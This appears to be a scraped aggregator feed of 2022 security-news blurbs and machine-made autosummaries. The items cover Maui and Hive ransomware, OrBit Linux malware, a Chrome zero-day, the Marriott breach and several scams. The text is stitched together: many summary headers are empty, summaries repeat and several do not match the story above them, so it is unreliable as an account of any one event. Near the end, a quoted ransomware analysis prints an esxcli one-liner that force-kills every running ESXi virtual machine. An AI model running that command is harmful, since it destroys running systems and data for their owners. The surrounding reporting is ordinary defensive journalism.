The most typical scenarios involving attacks on law enforcement systems include: Protest activity (15%) Unauthorized access (25%) Cyberespionage (40%) Law enforcement systems and applications abuse (8%) Data theft (12%) Based on the published research, such malicious activity is especially visible in countries of Latin America, South-East Asia, and offshore jurisdictions. "Socura released its new Managed Vulnerability Scanning (MVS) service. Socura’s MVS service has been designed to help clients identify potential vulnerabilities and misconfigurations across all on- and off-premises systems, including their local network, cloud applications, web applications and mobile devices. This allows them to prioritise their remediation efforts, stay compliant with cyber security regulations, and be more proactive in resolving security issues. The service offers continuous identification and mitigation of vulnerabilities, can run on demand … More
The post Socura launches Managed Vulnerability Scanning service to help users identify potential vulnerabilities appeared first on Help Net Security.
"Autosummary:
"A less known ransomware threat dubbed Maui has been and is likely to continue hitting healthcare organizations, a new CISA alert warns. Maui is unusual in many ways: it does not show a ransom note, it does not rely upon external infrastructure to receive encryption keys, and it does not encrypt files and/or systems indiscriminately. Instead, its operators – believed to be North Korean state-sponsored cyber actors – operate it manually and choose which things … More
The post Healthcare organizations targeted with Maui ransomware appeared first on Help Net Security.
"Autosummary:
Maui ransomware encryption At the inner layer, files are encrypted using AES with a unique 16-byte key for each file, and the AES keys are RSA-encrypted using a key pair generated the first time Maui is run, Silas Cutler, Principal Reverse Engineer at Stairwell, explained. "Autosummary:
The rogue shared library is engineered to hook functions from three libraries — libc, libcap, and Pluggable Authentication Module (PAM) — causing existing and new processes to use the modified functions, essentially permitting it to harvest credentials, hide network activity, and set up remote access to the host over SSH, all the while staying under the radar. "Autosummary:
"Autosummary:
"North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services," the authorities noted. "Cybersecurity researchers warn of new malware, tracked as OrBit, which is a fully undetected Linux threat. Cybersecurity researchers at Intezer have uncovered a new Linux malware, tracked as OrBit, that is still undetected. The malware can be installed as a volatile implant either by achieving persistence on the compromised systems. The malware implements advanced evasion […]
The post OrBit, a new sophisticated Linux malware still undetected appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
This is part of Conti"s new modus operandi where its members have either infiltrated or taken control of other ransomware operations such as Hive, AvosLocker, BlackCat, and Hello Kitty or data extortion gangs like Karakurt, BlackByte, and the Bazarcall collective. "Autosummary:
You should also disable SMB 1 by logging into QTS, QuTS hero, or QuTScloud, going to Control Panel > Network & File > Win/Mac/NFS/WebDAV > Microsoft Networking, and selecting "SMB 2 or higher" after clicking on Advanced Options. "Autosummary:
"In addition, in order to prevent individual malpractice, we have implemented a responsible disclosure policy and monitor our systems on an ongoing basis to mitigate risk" - DataCamp Abuse likely possible on other platforms Although Profero did not extend their research to other learning platforms, the researchers believe that DataCamp is not the only one that hackers could abuse. "Apple has struck a big blow against the mercenary “surveillance-as-a-service” industry, introducing a new, highly secure Lockdown Mode to protect individuals at the greatest risk of targeted attacks. The company is also offering millions of dollars to support research to expose such threats.
Starting in iOS 16, iPadOS 16 and macOS Ventura, and available now in the latest developer-only betas, Lockdown Mode hardens security defenses and limits the functionalities sometimes abused by state-sponsored surveillance hackers. Apple describes this protection as “sharply reducing the attack surface that potentially could be exploited by highly targeted mercenary spyware.”
Autosummary:
“We congratulate [Apple] for providing protection to human rights defenders, heads of state, lawyers, activists, journalists, and more,” tweeted the EFF, a privacy advocacy group. Apple is also making a $10 million grant, plus any damages awarded from the lawsuit it is pursuing against NSO Group, to support organizations that investigate, expose, and prevent highly targeted cyberattacks, including those created by private companies developing state-sponsored mercenary spyware.Victims have included journalists, politicians, civil society advocates, activists, and diplomats, so while the numbers are small, the chilling impact of such surveillance is vast. Ford Foundation Tech and Society Program director Lori McGlinchey said: “The global spyware trade targets human rights defenders, journalists, and dissidents; it facilitates violence, reinforces authoritarianism, and supports political repression. “Apple’s newly released Lockdown Mode will reduce the attack surface, increase costs for spyware firms, and thus make it much harder for repressive governments to hack high-risk users,” said John Scott-Railton, senior researcher at the Citizen Lab at the University of Toronto"s Munk School of Global Affairs and Public Policy. "US authorities have issued a joint advisory warning of North Korea-linked APTs using Maui ransomware in attacks against the Healthcare sector. The FBI, CISA, and the U.S. Treasury Department issued a joint advisory that warn of North-Korea-linked threat actors using Maui ransomware in attacks aimed at organizations in the Healthcare sector. “The Federal Bureau of […]
The post North Korea-linked APTs use Maui Ransomware to target the Healthcare industry appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Best regards, Christian Brdakic Legal Officer zoho, Inc. zoho.com 07/06/2022" However, what was different with this campaign is that instead of using Google Drive or Google Sites to host their alleged "reports" like they did in the past, the threat actors are now using Yandex Forms. "Autosummary:
"The malware implements advanced evasion techniques and gains persistence on the machine by hooking key functions, provides the threat actors with remote access capabilities over SSH, harvests credentials, and logs TTY commands," Intezer Labs security researcher Nicole Fishbein explained. "Atera announced a new integration with Malwarebytes, a provider of real-time cyber protection. Atera is the first remote management company to offer an integration that automates licensing and provisioning of the Malwarebytes OneView platform. This partnership plays an integral role for Atera to provide streamlined and maximized security operations for its community of more than 10,000 customers across 105 countries. “With workplaces continuing to evolve and employees working from anywhere in the world, the risk … More
The post Atera integrates with Malwarebytes to protect organizations against ransomware attacks appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"NPower, a US-based non-profit participating in a cybersecurity workforce development program started by the Cybersecurity and Infrastructure Agency (CISA), is looking for recruits for a free cybersecurity training program aimed at underserved populations in the US, including women, people of color, young adults, and military veterans and their spouses. The program is part of CISA’s wider effort to address the cyber workforce shortage in the short and long term. We’ve asked Nelson Abbott, Senior Director … More
The post CISA and NPower offer free entry-level cybersecurity training appeared first on Help Net Security.
"Autosummary:
NPower, a US-based non-profit participating in a cybersecurity workforce development program started by the Cybersecurity and Infrastructure Agency (CISA), is looking for recruits for a free cybersecurity training program aimed at underserved populations in the US, including women, people of color, young adults, and military veterans and their spouses.Trainees gain an understanding of the basic theories of cybersecurity, as well as hands-on experience with many of the tools that are used by cyber professionals (Linux, NMap, Wireshark, Metasploit, Webgoat, FoxyProxy, etc). The program is offered nationally to candidates that reside in or near the regions we currently operate in: New York/New Jersey, Maryland, Michigan, Missouri, Texas and California. We’ve asked Nelson Abbott, Senior Director of Advanced Program Operations at NPower, and Chris Starling, a US Marine Corps veteran and Assistant VP at NPower California, to tell us more about it. "Autosummary:
"Hive ransomware operators have improved their file-encrypting module by migrating to Rust language and adopting a more sophisticated encryption method. The operators of the Hive ransomware upgraded their malware by migrating the malware to the Rust language and implementing a more sophisticated encryption method, Microsoft researchers warn. “The upgrades in the latest variant are effectively […]
The post New Hive ransomware variant is written in Rust and use improved encryption method appeared first on Security Affairs.
"Autosummary:
The porting to Rust language provides the following advantages: It offers memory, data type, and thread safety It has deep control over low-level resources It has a user-friendly syntax It has several mechanisms for concurrency and parallelism, thus enabling fast and safe file encryption It has a good variety of cryptographic libraries It’s relatively more difficult to reverse-engineer The most important change in the latest Hive variant is the encryption mechanism it adopts. "Autosummary:
" Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "Autosummary:
"We take a look at reports that a Discord channel is being used to scare users into handing over login credentials.
The post Discord Shame channel goes phishing appeared first on Malwarebytes Labs.
"Autosummary:
Choose from “Everyone”, “Friends of friends”, and “Server members”. Discord itself warned users over two years ago to only scan QR codes taken directly from their browser, and to not use codes sent by other users. "Google upped it privacy efforts by deleting location history of visits to abortion clinics.
The post Google to delete location data of trips to abortion clinics appeared first on Malwarebytes Labs.
"Autosummary:
These include abortion clinics, addiction treatment facilities, counseling centers, domestic violence shelters, fertility centers, and other places deemed as sensitive locations. "The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations.
This joint CSA provides information—including tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs)—on Maui ransomware obtained from FBI incident response activities and industry analysis of a Maui sample. The FBI, CISA, and Treasury urge HPH Sector organizations as well as other critical infrastructure organizations to apply the recommendations in the Mitigations section of this CSA to reduce the likelihood of compromise from ransomware operations. Victims of Maui ransomware should report the incident to their local FBI field office or CISA.
The FBI, CISA, and Treasury highly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks. Note: in September 2021, Treasury issued an updated advisory highlighting the sanctions risks associated with ransomware payments and the proactive steps companies can take to mitigate such risks. Specifically, the updated advisory encourages U.S. entities to adopt and improve cybersecurity practices and report ransomware attacks to, and fully cooperate with, law enforcement. The updated advisory states that when affected parties take these proactive steps, Treasury’s Office of Foreign Assets Control (OFAC) would be more likely to resolve apparent sanctions violations involving ransomware attacks with a non-public enforcement response.
For more information on state-sponsored North Korean maliciou "
Autosummary:
Mitigations The FBI, CISA, and Treasury urge HPH Sector organizations to: Limit access to data by deploying public key infrastructure and digital certificates to authenticate connections with the network, Internet of Things (IoT) medical devices, and the electronic health record system, as well as to ensure data packages are not manipulated while in transit from man-in-the-middle attacks.In addition, the FBI, CISA, and Treasury urge all organizations, including HPH Sector organizations, to apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.Summary The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and the Department of the Treasury (Treasury) are releasing this joint Cybersecurity Advisory (CSA) to provide information on Maui ransomware, which has been used by North Korean state-sponsored cyber actors since at least May 2021 to target Healthcare and Public Health (HPH) Sector organizations. Apply incident response best practices found in the joint Cybersecurity Advisory, Technical Approaches to Uncovering and Remediating Malicious Activity, developed by CISA and the cybersecurity authorities of Australia, Canada, New Zealand, and the United Kingdom.Regardless of whether you or your organization have decided to pay the ransom, the FBI, CISA, and Treasury urge you to promptly report ransomware incidents to the FBI at a local FBI Field Office, CISA at us-cert.cisa.gov/report, or the USSS at a USSS Field Office.For breaches involving electronic health information, you may need to notify the Federal Trade Commission (FTC) or the Department of Health and Human Services, and, in some cases, the media.Request for Information The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, bitcoin wallet information, the decryptor file, and/or benign samples of encrypted files.North Korean state-sponsored cyber actors used Maui ransomware in these incidents to encrypt servers responsible for healthcare services—including electronic health records services, diagnostics services, imaging services, and intranet services. "Autosummary:
"Autosummary:
"Autosummary:
Since December 2021, NSO Group spyware was also found deployed on iPhones belonging to Catalan politicians, journalists, and activists, Finnish diplomats, UK government employees, and U.S. Department of State employees. "Autosummary:
Hackers switch to Brute Ratel In 2020, Chetan Nayak, an ex-red teamer at Mandiant and CrowdStrike, released Brute Ratel Command and Control Center (BRc4) as an alternative to Cobalt Strike for red team penetration testing engagements. Windows shortcut disguised as CV to launch a program Source: BleepingComputer While OneDriveUpdater.exe is a legitimate Microsoft executable, the included version.dll that is loaded by the program has been modified to act as a loader for a Brute Ratel badger, which is loaded into the RuntimeBroker.exe process. "Autosummary:
" Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "Here’s what to watch out for when buying or selling stuff on the online marketplace and how to tell if you’re being scammed
The post 8 common Facebook Marketplace scams and how to avoid them appeared first on WeLiveSecurity
"Autosummary:
Check the original price of items and if there is a significant gulf between this and the for-sale price, be alert to the fact it may be counterfeit/stolen/defective, etc. and if there is a significant gulf between this and the for-sale price, be alert to the fact it may be counterfeit/stolen/defective, etc.Of course, much of the commerce on this “classified-ad section” of Facebook is legitimate, but like any other online marketplace, it also attracts plenty of scammers.In so doing, it’s become a giant of the consumer-to-consumer space, allowing individual Facebook users to buy from and sell to each other seamlessly. How to spot a Facebook Marketplace scam As with any kind of online fraud, the key for internet users is to remain sceptical and alert. As the cost-of-living crisis bites, more users than ever will be turning to online platforms like Facebook Marketplace to get hold of goods at discounted rates. "Experts observed an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Resecurity, a Los Angeles-based cybersecurity company protecting Fortune 500 companies worldwide, has registered an increase in malicious activity targeting law enforcement agencies at the beginning of Q2 2022. Threat actors are hacking email and other accounts which belong […]
The post Cyberattacks against law enforcement are on the rise appeared first on Security Affairs.
"Autosummary:
The most typical scenarios involving attacks on law enforcement systems include: Protest Activity (15%) Unauthorized Access (25%) Cyberespionage (40%) Law Enforcement Systems and Applications Abuse (8%) Data Theft (12%) Based on the published research, such malicious activity is especially visible in countries of Latin America, South-East Asia, and offshore jurisdictions. "Hotel chain Marriott International suffered a new data breach, a threat actor has stolen 20GB from the company. Hotel chain Marriott International confirmed it has suffered a new data breach after a threat actor stole 20GB of files from one of its properties. The attacker compromised the network at the BWI Airport Marriott Maryland (BWIA), […]
The post Marriott International suffered a new data breach, attackers stole 20GB of data appeared first on Security Affairs.
"Autosummary:
“Marriott acknowledged that while most of the data acquired by GNN was what Marriott described as non-sensitive internal business files, they will be notifying approximately 300-400 individuals and any regulators, as required. "Autosummary:
" Data breach affected 300-400 individuals While the company did not share any info on the stolen data with BleepingComputer, it told DataBreaches (who first reported the incident) that the 20GB worth of documents stolen during the breach contained non-sensitive internal business files and some credit card information. "As the alternative investment industry tackles a rapidly changing threat landscape, increased regulation, and a continuous need to innovate, most firms are increasing their DX and security budgets and cite security as critically important to their DX initiatives, according to IDC. Senior leaders from 400 global alternative investment institutions in U.S., Canada, France, U.K., and Germany were surveyed to understand the current state of digital transformation and cybersecurity, identify key barriers and benefits of an … More
The post Cybersecurity is driving digital transformation in alternative investment institutions appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
While ransomware groups are known to rely on the dark web to conceal their illicit activities ranging from leaking stolen data to negotiating payments with victims, Talos disclosed that it was able to identify "public IP addresses hosting the same threat actor infrastructure as those on the dark web." "The methods we used to identify the public internet IPs involved matching threat actors" [self-signed] TLS certificate serial numbers and page elements with those indexed on the public internet," Eubanks said. "AstraLocker ransomware operators told BleepingComputer they’re shutting down their operations and are releasing decryptors. AstraLocker ransomware operators told BleepingComputer they’re shutting down the operation and provided decryptors to the VirusTotal malware analysis platform. AstraLocker is based on the source code of the Babuk Locker (Babyk) ransomware that was leaked online on June 2021. BleepingComputer tested the […]
The post AstraLocker ransomware operators shut down their operations appeared first on Security Affairs.
"Autosummary:
"There are some scary reports popping up that various major financial institutions no longer credit back all fraudulent transactions, even when victims file a police report. If true, it"s a disastrous move that will painfully hurt the institutions.
Let’s look a recent New York Times report on the problem:
Autosummary:
Some quick background: Many of the issues here are similar to the major credit card brands’ (MasterCard, Visa, AmericanExpress, Discover, etc.)Other than a ruling that they could, maybe, get reimbursed for the time spent cleaning up the mess, few companies suffered sufficient out-of-pocket losses to make a trip to civil court worthwhile or even likely to succeed. "Autosummary:
The overlaps in the code, combined with contextual clues and even recycled jokes, indicate that the same threat actor, dubbed Indra, is behind the attacks impacting Iran’s infrastructure. "Autosummary:
Other Fixes In addition to fixing the zero-day buffer overflow flaw, the Chrome releases also patch a type confusion flaw in the V8 JavaScript engine tracked as CVE-2022-2295 and reported June 16 by researchers “avaue” and “Buff3tts” at S.S.L., according to the post. "Threat actors compromised the Twitter and YouTube accounts of the British Army to promote online crypto scams. The Twitter and YouTube accounts of the British Army were used to promote NFT and other crypto scams. The YouTube account was used to transmit an older Elon Musk clip that attempts to trick users into visiting cryptocurrency scam […]
The post Threat actors compromised British Army ’s Twitter, YouTube accounts to promote crypto scams appeared first on Security Affairs.
"Autosummary:
Linkedin Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Autosummary:
NTLM relay attacks and mitigations To coerce a remote server to authenticate against a malicious NTLM relay, threat actors could use various methods, including the MS-RPRN and the MS-EFSRPC (PetitPotam) protocols. "Cloud-based malware in on the rise. In this post, we’ll cover four ways you can help secure your business against cloud-based malware.
The post Cloud-based malware is on the rise. How can you secure your business? appeared first on Malwarebytes Labs.
"Autosummary:
Prevent cloud-based malware from getting a hold on your organization Cloud-based malware is one of many threats to cloud security that businesses should address, and since cloud providers operate under a shared responsibility model, you need to have a game plan ready in the case of a cloud-based malware attack. 3. Use a second-opinion cloud storage scanner to detect cloud-based malware Even if you have fixed all the holes in your cloud security and use a top-notch EDR product, the reality is that malware can still make it through to the cloud — and that’s why regular cloud storage scanning is so important. 4. Have a data backup strategy in place The worst case scenario: You’ve properly configured your cloud, secured all your endpoints, and regularly scan your cloud storage — yet cloud-based malware still manages to slip past your defenses and encrypt all your files. "Google has patched a vulnerability in Chrome which was being exploited in the wild. Make sure you"re using the latest version.
The post Update now! Chrome patches ANOTHER zero-day vulnerability appeared first on Malwarebytes Labs.
"Autosummary:
It supports video, voice, and generic data to be sent between peers, allowing developers to build powerful voice- and video-communication solutions. CVE-2022-2294 is a high severity heap-based buffer overflow weakness in the Web Real-Time Communications (WebRTC) component which is being exploited in the wild. "Iran’s Fars News Agency reported that a massive cyberattack hit operating systems and servers of the Tel Aviv Metro. Iran’s Fars News Agency reported on Monday that operating systems and servers of the Tel Aviv Metro were hit by a massive cyberattack. The rail system is still under construction and according to The Jerusalem Post, […]
The post Iranian Fars News Agency claims cyberattack on a company involved in the construction of Tel Aviv metro appeared first on Security Affairs.
"Autosummary:
"The Cyber Police of Ukraine arrested nine members of a cybercriminal gang that has stolen 100 million hryvnias via phishing attacks. The Cyber Police of Ukraine arrested nine members of a cybercriminal organization that stole 100 million hryvnias via phishing attacks. The crooks created more than 400 phishing sites for obtaining the banking data of […]
The post Cyber Police of Ukraine arrested 9 men behind phishing attacks on Ukrainians attempting to capitalize on the ongoing conflict appeared first on Security Affairs.
"Autosummary:
361 (Unauthorized interference in the work of information (automated), electronic communication, information and communication systems, electronic communication networks) of the Criminal Code of Ukraine. "Autosummary:
DEBUG TESTS -h Show this message When running the ransomware with the " -w " argument, the Linux encryptor will shut down all running VMware ESXi virtual machines using the following esxcli command: esxcli --formatter=csv --format-param=fields=="WorldID,DisplayName" vm process list | tail -n +2 | awk -F $"," "{system("esxcli vm process kill --type=force --world-id=" $1)}" When encrypting files, the ransomware utilizes the NTRUEncrypt public-key encryption algorithm, which support various "Parameter Sets" that offer different levels of security. "MetricStream announced that Gaurav Kapoor and Prasad Sabbineni have been appointed as co-Chief Executive Officers. MetricStream has grown consistently over the last decade to become an established market leader in the GRC space. Over the past two years, MetricStream benefited from Bruce Dahlgren’s leadership as CEO by expanding the go-to-market with fresh branding, a simplified product portfolio, strategic partnerships, and accelerated GRC SaaS leadership. Last quarter, Dahlgren moved to an advisory role and helped transition … More
The post MetricStream appoints Gaurav Kapoor and Prasad Sabbineni as Co-CEOs appeared first on Help Net Security.
"Autosummary:
He oversaw technology for enterprise GRC functions of Risk Management, Compliance, Internal Audit, Information Security, Third-Party Management as well as Finance, Treasury, HR, Data, across the entire bank globally at Citi. "Cloud-based malware in on the rise. In this post, we’ll cover four ways you can help secure your business against cloud-based malware.
The post Cloud-based malware is on the rise. How can you secure your business? appeared first on Malwarebytes Labs.
"Autosummary:
Prevent cloud-based malware from getting a hold on your organization Cloud-based malware is one of many threats to cloud security that businesses should address, and since cloud providers operate under a shared responsibility model, you need to have a game plan ready in the case of a cloud-based malware attack. 3. Use a second-opinion cloud storage scanner to detect cloud-based malware Even if you have fixed all the holes in your cloud security and use a top-notch EDR product, the reality is that malware can still make it through to the cloud — and that’s why regular cloud storage scanning is so important. 4. Have a data backup strategy in place The worst case scenario: You’ve properly configured your cloud, secured all your endpoints, and regularly scan your cloud storage — yet cloud-based malware still manages to slip past your defenses and encrypt all your files. "Jen Easterly, the director of the US Cybersecurity and Infrastructure Security Agency (CISA), has warned the UK government that they could be the victim of a 9/11-style cyber-attack unless they face up to the “magnitude of the threat” posed by ransomware. In agreement with this, Steve Barclay, the UK government Minister responsible for cybersecurity, claims that “the greatest cyber threat to the UK – one now deemed severe enough to pose a national security threat … More
The post Is the UK government prepared for its greatest threat? appeared first on Help Net Security.
"Autosummary:
With the percentage of nation-states passing legislation to regulate ransomware payments, fines, and negotiations expected to rise to 30% by the end of 2025, compared with less than 1% in 2021, this is clearly the beginnings of awareness surrounding the devastating impact ransomware can have. In agreement with this, Steve Barclay, the UK government Minister responsible for cybersecurity, claims that “the greatest cyber threat to the UK – one now deemed severe enough to pose a national security threat – is from ransomware attacks.” "Autosummary:
"Autosummary:
On the main branch On the 4.1 release branch On the 4.0 release branch On the 3.2 release branch Patches to resolve the issue have been applied to Django"s main branch and to the 4.1, 4.0, and 3.2 release branches. "Autosummary:
"Bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted to claim additional bounties The vulnerability coordination and bug bounty platform HackerOne disclosed that a former employee improperly accessed security reports submitted by white-hat hackers to claim additional bounties. The investigation started on June 22nd, 2022, when a customer asked the […]
The post Unfaithful HackerOne employee steals bug reports to claim additional bounties appeared first on Security Affairs.
"Autosummary:
The company announced a series of additional improvements, such as implementing additional logging processes to improve incident response, implementing data isolation to reduce the “blast radius,” planning additional red teaming activities, and enhancing processes to identify anomalous access and proactively detect insider threats. "Autosummary:
Threat actors in control of the account then began tweeting and retweeting links to crypto scam sites: British Army verified Twitter account hacked and renamed to "pssssd" (Wayback Machine) Hackers are increasingly targeting verified Twitter accounts to conduct various nefarious activities—from scamming victims for money to sending fake account "suspension" notices, as reported by BleepingComputer this week. "Autosummary:
"Autosummary:
The list of decryption tools released in the past includes Avaddon, Ragnarok, SynAck, TeslaCrypt, Crysis, AES-NI, Shade, FilesLocker, Ziggy, and FonixLocker. "Autosummary:
Attack details not revealed The zero-day bug fixed today (tracked as CVE-2022-2294) is a high severity heap-based buffer overflow weakness in the WebRTC (Web Real-Time Communications) component, reported by Jan Vojtesek of the Avast Threat Intelligence team on Friday, July 1. "One in five organizations have teetered on the brink of insolvency after a cyberattack. Can your company keep hackers at bay?
The post Cyberattacks: A very real existential threat to organizations appeared first on WeLiveSecurity
"Autosummary:
Several best practices are highlighted, including the following: Formalize cybersecurity with clearly defined roles and board or senior management buy-in Ensure top execs have clear visibility into and engagement with cybersecurity Follow best practice standards such as the US National Institute of Standards and Technology (NIST) framework Spread investment over NIST’s five key functions – identify, protect, detect, respond and recover Focus on incident response planning and attack simulations in light of current geopolitical uncertainty Regularly assess corporate data and technology infrastructure Provide effective cybersecurity awareness training Ensure business suppliers and partners adhere to security requirements Focus on “low-hanging fruit” processes such as patching, pentesting and regular backups Taken together, these steps will help minimize the chances of an attack ultimately bankrupting the organization.According to the report, the main vectors for attack are: Cloud severs (41%) Business email (40%) Corporate servers (37%) Remote access servers (31%) Employee-owned mobile devices (29%) DDoS (26%) This chimes with the findings of other reports and the narrative that remote working, pandemic-related investments in cloud infrastructure and remote working security challenges are some of the biggest risks facing organizations today. "Google addressed a high-severity zero-day Chrome vulnerability actively exploited in the wild, it is the fourth zero-day patched in 2022. Google has released Chrome 103.0.5060.114 for Windows to fix a high-severity zero-day Chrome vulnerability, tracked as CVE-2022-2294, which is actively exploited in the wild. The flaw is a heap buffer overflow that resides in the […]
The post Google fixes the fourth Chrome zero-day in 2022 appeared first on Security Affairs.
"Autosummary:
"Google addressed a high-severity zero-day Chrome vulnerability actively exploited in the wild, it is the fourth zero-day patched in 2022. Google has released Chrome 103.0.5060.114 for Windows to fix a high-severity zero-day Chrome vulnerability, tracked as CVE-2022-2294, which is actively exploited in the wild. The flaw is a heap buffer overflow that resides in the […]
The post Google fixes the fourth Chrome zero-day in 2022 appeared first on Security Affairs.
"Autosummary:
"Google Project Zero states that in H1 2022 at least half of zero-day issues exploited in attacks were related to not properly fixed old flaws. Google Project Zero researcher Maddie Stone published a blog post that resumes her speech at the FIRST conference in June 2022, the presentation is titled “0-day In-the-Wild Exploitation in 2022…so […]
The post Half of actively exploited zero-day issues in H1 2022 are variants of previous flaws appeared first on Security Affairs.
"Autosummary:
Stone revealed that nine out of 18 zero-day flaws detected and disclosed as exploited in-the-wild in 2022 are variants of previously patched vulnerabilities “As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. "Jenkins security team disclosed tens of flaws affecting 29 plugins for the Jenkins automation server, most of them are yet to be patched. Jenkins is the most popular open-source automation server, it is maintained by CloudBees and the Jenkins community. The automation server supports developers build, test and deploy their applications, it has hundreds of thousands […]
The post Tens of Jenkins plugins are affected by zero-day vulnerabilities appeared first on Security Affairs.
"Autosummary:
"Resecurity announced its award-winning cybersecurity threat intelligence and risk monitoring platform is now available on Microsoft’s Azure Marketplace. Microsoft’s Azure Marketplace is the most comprehensive marketplace on the planet, offering thousands of certified cloud applications and software to over four million active users and subscribers. With cyber-risk ranking as a top concern for CEOs and business owners, enterprises are looking for additional support to secure and manage the evolving cyber threatscape. More importantly, they’re looking … More
The post Resecurity’s cybersecurity solutions now available in the Microsoft Azure marketplace appeared first on Help Net Security.
"Autosummary:
Microsoft Azure users who integrate Resecurity into their cybersecurity strategy will benefit from: Around-the-clock security monitoring of your cloud workloads and enterprise ecosystem, In-depth risk evaluation of the entire enterprise ecosystem (Dark Web, Compromised Accounts, Data Leaks, Network Hygiene, Cloud Security, etc.), A scalable software solution that can monitor a digital footprint of any size (Domains, Network Ranges, Cloud-based Nodes), AI-powered threat intelligence that leverages Rescurity’s Dark Web intelligence repositories with over 3.4 billion records and cyber intelligence analysts deployed across all continents, Contextualized risk alerts and data-backed suggested actions to enable a proactive security strategy. "A cyber attack forced the American publishing giant Macmillan to shut down its IT systems. The publishing giant Macmillan has been hit by a cyberattack that forced the company to shut down its IT infrastructure to prevent the threat from spreading within its network. The company spokesman Erin Coffey told different media outlets that attackers have encrypted […]
The post A ransomware attack forced publishing giant Macmillan to shuts down its systems appeared first on Security Affairs.
"Autosummary:
"Autosummary:
Less than 24 hours after starting the investigation, the bug bounty platform identified the threat actor, terminated their system access, and remotely locked their laptop pending the inquiry. "Researchers shared technical details and proof-of-concept exploit code for the CVE-2022-28219 flaw in Zoho ManageEngine ADAudit Plus tool. Security researchers from Horizon3.ai have published technical details and proof-of-concept exploit code for a critical vulnerability, tracked as CVE-2022-28219 (CVSS 9.8 out of 10), in the Zoho ManageEngine ADAudit Plus tool. The tool allows monitoring activities of […]
The post Experts shared PoC exploit code for RCE in Zoho ManageEngine ADAudit Plus tool appeared first on Security Affairs.
"Autosummary:
Security researchers from Horizon3.ai have published technical details and proof-of-concept exploit code for a critical vulnerability, tracked as CVE-2022-28219 (CVSS 9.8 out of 10), in the Zoho ManageEngine ADAudit Plus tool. "Autosummary:
"Autosummary:
Besides achieving persistence by means of a cron job, the "loader uses the IP port scanner tool "masscan" to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool "spirit" to propagate," Microsoft said. "Autosummary:
"Autosummary:
This means that the contributors of `mkdirp` have come to the conclusion that they are not compatible with newer versions of `minimist`, and forcing the update of `minimist` may introduce breaking changes between `mkdirp` and `minimist`.To perform this update, simply run `npm update`, delete your `npm.lock` file, and run `npm install`. So, the million-dollar question is: what version of `mocha` should be used, that in turn trickles down to a safe version of `minimist` without breaking the dependency tree? "Autosummary:
But whereas a typical romance scammer may pursue a line of "I-love-you-please-send-me-money-to-pay-for-my-mothers-urgent-surgery", the scams that the FTC is warning about take a different approach. "Autosummary:
The JavaScript code, for its part, is designed to click on HTML elements that contain keywords such as "confirm," "click," and "continue" to programmatically initiate the subscription. "Autosummary:
Bypassing authentication, stealing logins Once Sunkavally found a way to execute code remotely, he started to look for methods to upload files without authentication and found that some ADAudit Plus endpoints used by agents running on the machine to upload security events did not require authentication. "Autosummary:
Contributors and those who provided new ransomware information and stories this week include: @PolarToffee, @fwosar, @struppigel, @BleepinComputer, @serghei, @Ionut_Ilascu, @DanielGallagher, @malwrhunterteam, @LawrenceAbrams, @VK_Intel, @billtoulas, @jorntvdw, @malwareforme, @FourOctets, @demonslay335, @Seifreed, @ReversingLabs, @ValeryMarchive, @TrendMicro, @kisa118, @ahnlab, @PogoWasRight, @Amigo_A_, @Kangxiaopao, and @pcrisk. Finally, we also learned about various attacks this week, including those on Macmillan, Fitzgibbon Hospital, Med. "Autosummary:
"Through malice or carelessness, AstraLocker breaks the "circle of trust".
The post AstraLocker 2.0 ransomware isn’t going to give you your files back appeared first on Malwarebytes Labs.
"Autosummary:
Reaffirming (and then breaking) the circle of trust When decryption doesn’t happen, either because of a poor quality decryptor, or because no decryption process actually exists, the ransomware author’s so-called circle of trust is broken. In a ransomware attack, criminals typically break into a victim’s network via a trojan that has already infected a computer, by exploiting a software vulnerability on an Internet-facing server, or with stolen Remote Desktop Protocol (RDP) credentials. In its rush to encrypt, AstraLocker still manages to do some standard ransomware things: It tries to disable security programs; it also stops applications running that might prevent encryption from taking place; and it avoids virtual machines, which might indicate it’s being run by researchers in a lab. "As scammers continue to ask people to take fake surveys, can you recognize some common telltale signs you"re dealing with a scam?
The post Watch out for survey scams – Week in security with Tony Anscombe appeared first on WeLiveSecurity
"Autosummary:
"The lead-up to the Canada Day festivities has brought a tax scam with it
The post Phishing scam poses as Canadian tax agency before Canada Day appeared first on WeLiveSecurity
"Autosummary:
But there are other popular contenders for phishing lures, such as fake Facebook and WhatsApp login pages and websites masquerading as email services and gaming platforms: Although, in this case, the malicious operators targeted the credit card and personal information of Canadians, phishing can encompass a variety of goals like ransomware downloads, banking trojans, cryptojacking malware, and botnet deployments. "LockBit remained the most active threat in June, and “the costliest strain of ransomware ever documented” went dark while others surged.
The post Ransomware review: June 2022 appeared first on Malwarebytes Labs.
"Autosummary:
